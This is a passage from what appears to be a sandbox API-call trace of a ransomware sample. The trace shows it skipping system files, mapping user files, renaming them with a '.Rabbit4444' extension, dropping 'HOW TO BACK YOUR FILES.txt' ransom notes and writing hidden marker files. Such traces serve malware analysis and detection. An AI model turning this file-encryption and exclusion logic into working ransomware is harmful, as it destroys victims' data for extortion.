(lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_COOBE_CortanaIcon[1].png", lpString2=".") returned 1 [0070.040] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_COOBE_CortanaIcon[1].png", lpString2="..") returned 1 [0070.040] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_COOBE_CortanaIcon[1].png", lpString2="windows") returned -1 [0070.040] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_COOBE_CortanaIcon[1].png", lpString2="bootmgr") returned 1 [0070.040] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_COOBE_CortanaIcon[1].png", lpString2="pagefile.sys") returned -1 [0070.040] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_COOBE_CortanaIcon[1].png", lpString2="boot") returned 1 [0070.040] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_COOBE_CortanaIcon[1].png", lpString2="ids.txt") returned -1 [0070.040] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_COOBE_CortanaIcon[1].png", lpString2="NTUSER.DAT") returned -1 [0070.040] lstrcpyW (in: lpString1=0x130ec04, lpString2="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_COOBE_CortanaIcon[1].png" | out: lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_COOBE_CortanaIcon[1].png") returned="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_COOBE_CortanaIcon[1].png" [0070.040] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\2\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_COOBE_CortanaIcon[1].png", dwFileAttributes=0x2000) returned 1 [0070.040] lstrlenW (lpString="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_COOBE_CortanaIcon[1].png") returned 92 [0070.040] lstrlenW (lpString="Rabbit4444") returned 10 [0070.040] lstrcmpiW (lpString1="con[1].png", lpString2="Rabbit4444") returned -1 [0070.040] lstrlenW (lpString=".dll") returned 4 [0070.040] lstrcmpiW (lpString1=".png", lpString2=".dll") returned 1 [0070.041] lstrlenW (lpString=".lnk") returned 4 [0070.041] lstrcmpiW (lpString1=".png", lpString2=".lnk") returned 1 [0070.041] lstrlenW (lpString=".ini") returned 4 [0070.041] lstrcmpiW (lpString1=".png", lpString2=".ini") returned 1 [0070.041] lstrlenW (lpString=".sys") returned 4 [0070.041] lstrcmpiW (lpString1=".png", lpString2=".sys") returned -1 [0070.041] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\2\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_COOBE_CortanaIcon[1].png" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\appcache\\ie77eect\\2\\c__windows_systemapps_microsoft.windows.cortana_cw5n1h2txyewy_cache_coobe_cortanaicon[1].png"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x29c [0070.045] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0070.045] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=16135546565) returned 1 [0070.045] GetFileSizeEx (in: hFile=0x29c, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=6594) returned 1 [0070.045] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0070.045] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101fb8 [0070.045] CreateFileMappingW (hFile=0x29c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1cd0, lpName=0x0) returned 0x260 [0070.046] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1cd0) returned 0x70000 [0070.048] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x11b380 [0070.048] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0070.048] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11b380 | out: hHeap=0xe0000) returned 1 [0070.048] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0070.048] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11da10 [0070.048] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0070.049] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11da10 | out: hHeap=0xe0000) returned 1 [0070.049] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0070.049] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=16135934639) returned 1 [0070.049] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0070.049] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101fb8 | out: hHeap=0xe0000) returned 1 [0070.049] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0070.049] CloseHandle (hObject=0x260) returned 1 [0070.049] CloseHandle (hObject=0x29c) returned 1 [0070.049] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\2\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_COOBE_CortanaIcon[1].png.Rabbit4444") returned 205 [0070.049] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\2\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_COOBE_CortanaIcon[1].png" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\appcache\\ie77eect\\2\\c__windows_systemapps_microsoft.windows.cortana_cw5n1h2txyewy_cache_coobe_cortanaicon[1].png"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\2\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_COOBE_CortanaIcon[1].png.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\appcache\\ie77eect\\2\\c__windows_systemapps_microsoft.windows.cortana_cw5n1h2txyewy_cache_coobe_cortanaicon[1].png.rabbit4444"), dwFlags=0x1) returned 1 [0070.050] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc2636207, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xc2636207, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0x39619610, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x19c2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_COOBE_CortanaIcon[1].png", cAlternateFileName="C__WIN~1.PNG")) returned 0 [0070.050] FindClose (in: hFindFile=0x102510 | out: hFindFile=0x102510) returned 1 [0070.050] lstrcpyW (in: lpString1=0x130ec04, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0070.050] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\2\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\appcache\\ie77eect\\2\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0070.051] CreateFileMappingW (hFile=0x228, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x29c [0070.051] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0070.052] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0070.052] CloseHandle (hObject=0x29c) returned 1 [0070.052] CloseHandle (hObject=0x228) returned 1 [0070.052] GetCurrentThreadId () returned 0xd98 [0070.052] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x11d048 [0070.052] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" [0070.052] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11d948 | out: hHeap=0xe0000) returned 1 [0070.052] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11d040 | out: hHeap=0xe0000) returned 1 [0070.052] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" [0070.052] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\" [0070.052] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\.BFC0E91B00AE8A0620D3" [0070.052] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x228 [0070.054] WriteFile (in: hFile=0x228, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0070.057] FlushFileBuffers (hFile=0x228) returned 1 [0070.058] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0070.058] CloseHandle (hObject=0x228) returned 1 [0070.058] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy") returned 93 [0070.058] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0070.058] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7659308d, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xddff7455, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xf313653a, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1025d0 [0070.058] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.058] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0070.058] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0070.059] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0070.059] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7659308d, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xddff7455, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xf313653a, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0070.059] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.059] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0070.059] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0070.059] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0070.059] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0070.059] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf313653a, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf313653a, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf315bbc8, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0070.059] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.059] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0070.059] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7662ba0f, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x366f55bd, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x366f55bd, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AC", cAlternateFileName="")) returned 1 [0070.059] lstrcmpiW (lpString1="AC", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.059] lstrcmpiW (lpString1="AC", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0070.059] lstrcmpiW (lpString1="AC", lpString2="Rabbit4444.exe") returned -1 [0070.059] lstrcmpiW (lpString1="AC", lpString2=".") returned 1 [0070.059] lstrcmpiW (lpString1="AC", lpString2="..") returned 1 [0070.059] lstrcmpiW (lpString1="AC", lpString2="windows") returned -1 [0070.059] lstrcmpiW (lpString1="AC", lpString2="bootmgr") returned -1 [0070.059] lstrcmpiW (lpString1="AC", lpString2="pagefile.sys") returned -1 [0070.059] lstrcmpiW (lpString1="AC", lpString2="boot") returned -1 [0070.059] lstrcmpiW (lpString1="AC", lpString2="ids.txt") returned -1 [0070.059] lstrcmpiW (lpString1="AC", lpString2="NTUSER.DAT") returned -1 [0070.059] lstrcpyW (in: lpString1=0x130ebf4, lpString2="AC" | out: lpString1="AC") returned="AC" [0070.059] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\AC" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\AC") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\AC" [0070.059] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\AC", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\AC\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\AC\\" [0070.059] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\AC\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\AC\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\AC\\.BFC0E91B00AE8A0620D3" [0070.059] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\AC\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\ac\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x29c [0070.350] WriteFile (in: hFile=0x29c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0070.357] FlushFileBuffers (hFile=0x29c) returned 1 [0070.360] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\AC\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0070.361] CloseHandle (hObject=0x29c) returned 1 [0070.361] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122200 [0070.361] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xc2) returned 0x115dd0 [0070.361] RtlInterlockedPushEntrySList (in: ListHead=0xf6750, ListEntry=0x122208 | out: ListHead=0xf6750, ListEntry=0x122208) returned 0x0 [0070.361] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x765df54b, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xcf746fc3, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x765df54b, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 1 [0070.361] lstrcmpiW (lpString1="AppData", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.361] lstrcmpiW (lpString1="AppData", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0070.361] lstrcmpiW (lpString1="AppData", lpString2="Rabbit4444.exe") returned -1 [0070.361] lstrcmpiW (lpString1="AppData", lpString2=".") returned 1 [0070.361] lstrcmpiW (lpString1="AppData", lpString2="..") returned 1 [0070.361] lstrcmpiW (lpString1="AppData", lpString2="windows") returned -1 [0070.361] lstrcmpiW (lpString1="AppData", lpString2="bootmgr") returned -1 [0070.361] lstrcmpiW (lpString1="AppData", lpString2="pagefile.sys") returned -1 [0070.361] lstrcmpiW (lpString1="AppData", lpString2="boot") returned -1 [0070.361] lstrcmpiW (lpString1="AppData", lpString2="ids.txt") returned -1 [0070.361] lstrcmpiW (lpString1="AppData", lpString2="NTUSER.DAT") returned -1 [0070.362] lstrcpyW (in: lpString1=0x130ebf4, lpString2="AppData" | out: lpString1="AppData") returned="AppData" [0070.362] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122300 [0070.362] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xcc) returned 0x108688 [0070.362] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122308 | out: ListHead=0xf68b0, ListEntry=0x122308) returned 0x11d0c8 [0070.362] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x765df54b, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xcf74778d, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x765df54b, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LocalCache", cAlternateFileName="LOCALC~1")) returned 1 [0070.362] lstrcmpiW (lpString1="LocalCache", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0070.362] lstrcmpiW (lpString1="LocalCache", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0070.362] lstrcmpiW (lpString1="LocalCache", lpString2="Rabbit4444.exe") returned -1 [0070.362] lstrcmpiW (lpString1="LocalCache", lpString2=".") returned 1 [0070.362] lstrcmpiW (lpString1="LocalCache", lpString2="..") returned 1 [0070.362] lstrcmpiW (lpString1="LocalCache", lpString2="windows") returned -1 [0070.362] lstrcmpiW (lpString1="LocalCache", lpString2="bootmgr") returned 1 [0070.362] lstrcmpiW (lpString1="LocalCache", lpString2="pagefile.sys") returned -1 [0070.362] lstrcmpiW (lpString1="LocalCache", lpString2="boot") returned 1 [0070.362] lstrcmpiW (lpString1="LocalCache", lpString2="ids.txt") returned 1 [0070.362] lstrcmpiW (lpString1="LocalCache", lpString2="NTUSER.DAT") returned -1 [0070.362] lstrcpyW (in: lpString1=0x130ebf4, lpString2="LocalCache" | out: lpString1="LocalCache") returned="LocalCache" [0070.362] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122040 [0070.362] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xd2) returned 0x11b888 [0070.362] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122048 | out: ListHead=0xf68b0, ListEntry=0x122048) returned 0x122308 [0070.362] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7659308d, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xf06a22a2, ftLastAccessTime.dwHighDateTime=0x1d327e6, ftLastWriteTime.dwLowDateTime=0xf06a22a2, ftLastWriteTime.dwHighDateTime=0x1d327e6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LocalState", cAlternateFileName="LOCALS~1")) returned 1 [0070.362] lstrcmpiW (lpString1="LocalState", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0070.362] lstrcmpiW (lpString1="LocalState", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0070.362] lstrcmpiW (lpString1="LocalState", lpString2="Rabbit4444.exe") returned -1 [0070.362] lstrcmpiW (lpString1="LocalState", lpString2=".") returned 1 [0070.362] lstrcmpiW (lpString1="LocalState", lpString2="..") returned 1 [0070.362] lstrcmpiW (lpString1="LocalState", lpString2="windows") returned -1 [0070.362] lstrcmpiW (lpString1="LocalState", lpString2="bootmgr") returned 1 [0070.362] lstrcmpiW (lpString1="LocalState", lpString2="pagefile.sys") returned -1 [0070.362] lstrcmpiW (lpString1="LocalState", lpString2="boot") returned 1 [0070.362] lstrcmpiW (lpString1="LocalState", lpString2="ids.txt") returned 1 [0070.362] lstrcmpiW (lpString1="LocalState", lpString2="NTUSER.DAT") returned -1 [0070.362] lstrcpyW (in: lpString1=0x130ebf4, lpString2="LocalState" | out: lpString1="LocalState") returned="LocalState" [0070.362] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122260 [0070.362] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xd2) returned 0x11ba48 [0070.362] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122268 | out: ListHead=0xf68b0, ListEntry=0x122268) returned 0x122048 [0070.363] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x765b92ef, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd013c79b, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x765b92ef, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RoamingState", cAlternateFileName="ROAMIN~1")) returned 1 [0070.363] lstrcmpiW (lpString1="RoamingState", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0070.363] lstrcmpiW (lpString1="RoamingState", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0070.363] lstrcmpiW (lpString1="RoamingState", lpString2="Rabbit4444.exe") returned 1 [0070.363] lstrcmpiW (lpString1="RoamingState", lpString2=".") returned 1 [0070.363] lstrcmpiW (lpString1="RoamingState", lpString2="..") returned 1 [0070.363] lstrcmpiW (lpString1="RoamingState", lpString2="windows") returned -1 [0070.363] lstrcmpiW (lpString1="RoamingState", lpString2="bootmgr") returned 1 [0070.363] lstrcmpiW (lpString1="RoamingState", lpString2="pagefile.sys") returned 1 [0070.363] lstrcmpiW (lpString1="RoamingState", lpString2="boot") returned 1 [0070.363] lstrcmpiW (lpString1="RoamingState", lpString2="ids.txt") returned 1 [0070.363] lstrcmpiW (lpString1="RoamingState", lpString2="NTUSER.DAT") returned 1 [0070.363] lstrcpyW (in: lpString1=0x130ebf4, lpString2="RoamingState" | out: lpString1="RoamingState") returned="RoamingState" [0070.363] RtlAllocateHeap 